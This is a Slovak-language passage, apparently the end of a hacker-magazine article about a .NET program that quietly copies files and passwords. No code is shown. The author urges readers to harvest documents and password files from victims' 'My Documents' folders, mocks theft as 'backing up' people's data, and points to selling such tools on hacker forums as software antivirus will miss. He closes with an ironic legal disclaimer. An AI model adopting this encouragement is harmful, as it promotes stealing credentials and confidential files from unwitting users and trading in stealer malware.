    Technológia .NET výrazne zjednodušila našu úlohu, v dôsledku čoho sa celé kódovanie zredukovalo na volanie niekoľkých metód. Samozrejme, môžete povedať, že to nie je cool a že takéto veci je oveľa efektívnejšie písať vo WinAPI alebo ASM "e. V niektorých ohľadoch s vami súhlasím, ale majte na pamäti, na WinAPI a najmä na Asma , napíšte takýto program, ale neuspejete rýchlo. Zatiaľ čo iní píšu kilometrový kód, vy a ja budeme žať. Veľa šťastia v programovaní a ak máte nejaké otázky, napíšte do mydla.

    Nezabudnite, že veľa používateľov ukladá dôverné informácie do priečinka „Moje dokumenty“. Minimálne môžu existovať zaujímavé pracovné dokumenty a niekedy aj celé súbory s heslami. Svojho času (v bývalej práci) som našiel na počítači účtovníčky pekne naformátovaný súbor s heslami pre klientov bánk.

    Ako skutočný priateľ musíte pomôcť všetkým týmto ľuďom zálohovať ich citlivé informácie.

    Mnoho fór hackerov má veľa reklám na predaj tohto druhu softvéru. Rôzne ceny - od 10 $ do 100 $. Po dokončení príkladov uvedených v článku si môžete zarobiť kôru čierneho chleba s kaviárom. Opakujem, hlavné je pristupovať k veci kreatívne a všetko sa určite podarí. Opäť to nezistia antivírusy;).

    POZOR!

    Tento program používame výhradne na včasné zálohovanie obsahu flash diskov na disk a zálohovanie hesiel na flash disk. A čo ste si mysleli? Nelegálne používanie takéhoto softvéru je trestné!